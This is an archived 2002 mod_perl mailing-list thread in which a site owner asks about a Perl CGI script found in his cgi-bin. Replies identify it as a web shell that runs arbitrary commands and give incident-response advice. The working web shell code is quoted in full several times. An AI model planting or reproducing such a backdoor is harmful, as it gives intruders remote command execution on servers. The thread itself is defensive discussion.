You are viewing a plain text version of this content. The canonical link for it is here.
Posted to modperl@perl.apache.org by John Michael <jo...@acadiacom.net> on 2002/03/21 08:56:02 UTC
Off topic question & a little worried
Hi
I found this script in one of my cgi-bin's. Not sure where it came from.
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param("g");
my $a=param("s");
if ($a || $k) {
$l=`$k 2>&1`;
print start_form,textarea("g",$k,1,50);
print submit("sc");
print end_form;
print pre($l);
}
print $ENV{"SERVER_NAME"};
Can anyone tell me what it does.
Thanks
John Michael
Re: Off topic question & a little worried
Posted by Perrin Harkins <pe...@elem.com>.
John Michael wrote:
> Any idea as to how it got on my server.
Someone found a serious security hole in something you're running. You
have to assume that your server has been completely compromised and that
the entire world now has root access to it through a hundred backdoors
they installed. Take it off-line now, before you find out it sent
millions of porn spam messages. You can study it later to try and find
the problem.
- Perrin
Re: Off topic question & a little worried
Posted by Carsten Heinrigs <ca...@ocean7.com>.
http://www.chkrootkit.org/
http://www.incident-response.org/LKM.htm
--
Carsten Heinrigs
Ocean-7 Development
Tel: 212 533-7883
Re: Off topic question & a little worried
Posted by Robert Landrum <rl...@capitoladvantage.com>.
At 4:58 PM -0500 3/21/02, darren chamberlain wrote:
>Another alternative is to replace it with something that appears
>to do the same thing, but actually logs a ton of stuff from the
>requestor.
Unless the entire site has already been backdoored. If that is the
case, then this would serve no purpose, as the intruder could just
come in via the backdoor.
Any time a security breach takes place, the first action should
always be to take the box offline and access the extent of the breach
(multiple machines may be effected), backup the disk(s), and
reformat. Finally, restore only the trusted files (and only after
reviewing them for backdoors).
It's the only way to be sure that you've eliminated the problem.
Rob
--
When I used a Mac, they laughed because I had no command prompt. When
I used Linux, they laughed because I had no GUI.
Re: Off topic question & a little worried
Posted by le...@wrkhors.com.
-- Perrin Harkins <pe...@elem.com> on 03/21/02 17:07:27 -0500
> darren chamberlain wrote:
>> Another alternative is to replace it with something that appears
>> to do the same thing, but actually logs a ton of stuff from the
>> requestor.
>
> You can't trust any part of compromised box, right down to the 'ls' command.
> Once you know someone has been able to run arbitrary commands on your
> machine, they could have installed ANYTHING. They might have a rootkit, they
> might have replaced your ssh binary with something that mails passwords to
> them, they might be using your box as part of a DoS attack on someone else's
> site, they might be on your box running as root *right now*. You don't even
> know how they got on the box in the first place. Disconnect it.
You can usually trust read only media (e.g., CDR's placed
in a cdrom drive or mechanically write-locked floppy or
mio discs). Booting a "rescue" cd or one you've burned
after the insatll and before putting the box on line can
allow you to check what's going on and at least back up the
more useful portions of the system config files. You might
also want to use rescue-cd util's to back up the logs and
apache directories to try and track the schmuck to cracked
you.
Point is that even if you cannot trust anything at all
on your hard drives at this point you can still analyze
what's there and recover at least some of it.
enjoi.
--
Steven Lembark 2930 W. Palmer
Workhorse Computing Chicago, IL 60647
+1 800 762 1582
Re: Off topic question & a little worried
Posted by Perrin Harkins <pe...@elem.com>.
darren chamberlain wrote:
> Another alternative is to replace it with something that appears
> to do the same thing, but actually logs a ton of stuff from the
> requestor.
You can't trust any part of compromised box, right down to the 'ls'
command. Once you know someone has been able to run arbitrary commands
on your machine, they could have installed ANYTHING. They might have a
rootkit, they might have replaced your ssh binary with something that
mails passwords to them, they might be using your box as part of a DoS
attack on someone else's site, they might be on your box running as root
*right now*. You don't even know how they got on the box in the first
place. Disconnect it.
- Perrin
Re: Off topic question & a little worried
Posted by darren chamberlain <dl...@users.sourceforge.net>.
Quoting Ged Haywood <ge...@www2.jubileegroup.co.uk> [Mar 21, 2002 16:15]:
> > Any idea as to how it got on my server.
>
> Nope. There are a thousand ways it could have been done if
> your server is not carefully secured. Do waht Perrin said -
> take it offline, it can't be trusted - and read the CERT stuff
> that you've been pointed to by another useful reply.
Another alternative is to replace it with something that appears
to do the same thing, but actually logs a ton of stuff from the
requestor.
(darren)
--
My one regret in life is that I am not someone else.
-- Woody Allen
Re: Off topic question & a little worried
Posted by Joachim Zobel <nc...@netcologne.de>.
At 14:15 21.03.2002 -0600, you wrote:
>Any idea as to how it got on my server. It is owned by apache and in the
>apache group. That tells me that it was put on there by apache. It is in a
>directory that has the permissions 777 because the script that is normally
>in there keeps and writes traffic information, so I guess someone found a
>way to have apache write the file into that directory. But how did they get
>it to chmod 755?
That is a DON'T. Apache should not have write access to anything under
DocumentRoot.
Sorry, I know this does not help now.
Joachim
--
"... ein Geschlecht erfinderischer Zwerge, die fuer alles gemietet werden
koennen." - Bertolt Brecht - Leben des Galilei
Re: Off topic question & a little worried
Posted by Ged Haywood <ge...@www2.jubileegroup.co.uk>.
Hi there,
On Thu, 21 Mar 2002, John Michael wrote:
> Any idea as to how it got on my server.
Nope. There are a thousand ways it could have been done if your
server is not carefully secured. Do waht Perrin said - take it
offline, it can't be trusted - and read the CERT stuff that you've
been pointed to by another useful reply.
The server probably has a dozen back-doors in it now so it would be
irresponsible to leave it on line. Unless you *really* know what you
are doing from a security point of view (and without meaning to be
offensive it sounds vey much like you don't) you should wipe the discs
and reinstall the OS and server(s) from scratch.
Then do some serious reading about securing your server. Don't run
any daemons you don't have to run, especially ftp and sendmail, if you
aren't sure of them.
73,
Ged.
Re: Off topic question & a little worried
Posted by John Michael <jo...@acadiacom.net>.
Any idea as to how it got on my server. It is owned by apache and in the
apache group. That tells me that it was put on there by apache. It is in a
directory that has the permissions 777 because the script that is normally
in there keeps and writes traffic information, so I guess someone found a
way to have apache write the file into that directory. But how did they get
it to chmod 755?
John michael
> On Thu, 21 Mar 2002, John Michael wrote:
>
> > #!/usr/bin/perl
> > use CGI qw(:standard);
> > print header;
> > my $k=param("g");
> > my $a=param("s");
> > if ($a || $k) {
> > $l=`$k 2>&1`;
> > print start_form,textarea("g",$k,1,50);
> > print submit("sc");
> > print end_form;
> > print pre($l);
> > }
> > print $ENV{"SERVER_NAME"};
>
> It executes arbitrary commands as <whatever your httpds run as>.
>
>
> --
> Chris Reinhardt
> ctriv@dyndns.org
> Systems Architect
> Dynamic DNS Network Services
> http://www.dyndns.org/
>
>
Re: Off topic question & a little worried
Posted by Stas Bekman <st...@stason.org>.
Chris Reinhardt wrote:
> On Thu, 21 Mar 2002, John Michael wrote:
>
>
>>#!/usr/bin/perl
>>use CGI qw(:standard);
>>print header;
>>my $k=param("g");
>>my $a=param("s");
>>if ($a || $k) {
>> $l=`$k 2>&1`;
>> print start_form,textarea("g",$k,1,50);
>> print submit("sc");
>> print end_form;
>> print pre($l);
>>}
>>print $ENV{"SERVER_NAME"};
>>
>
> It executes arbitrary commands as <whatever your httpds run as>.
don't delete it, but add the -T flag
#!/usr/bin/perl -T
In addition for the hacker not being able to run anything and probably
not understanding why, you will be able to check the logs to see what IP
the script was called from and hopefully trace down the bugger.
_____________________________________________________________________
Stas Bekman JAm_pH -- Just Another mod_perl Hacker
http://stason.org/ mod_perl Guide http://perl.apache.org/guide
mailto:stas@stason.org http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
Re: Off topic question & a little worried
Posted by Chris Reinhardt <ct...@dyndns.org>.
On Thu, 21 Mar 2002, John Michael wrote:
> #!/usr/bin/perl
> use CGI qw(:standard);
> print header;
> my $k=param("g");
> my $a=param("s");
> if ($a || $k) {
> $l=`$k 2>&1`;
> print start_form,textarea("g",$k,1,50);
> print submit("sc");
> print end_form;
> print pre($l);
> }
> print $ENV{"SERVER_NAME"};
It executes arbitrary commands as <whatever your httpds run as>.
--
Chris Reinhardt
ctriv@dyndns.org
Systems Architect
Dynamic DNS Network Services
http://www.dyndns.org/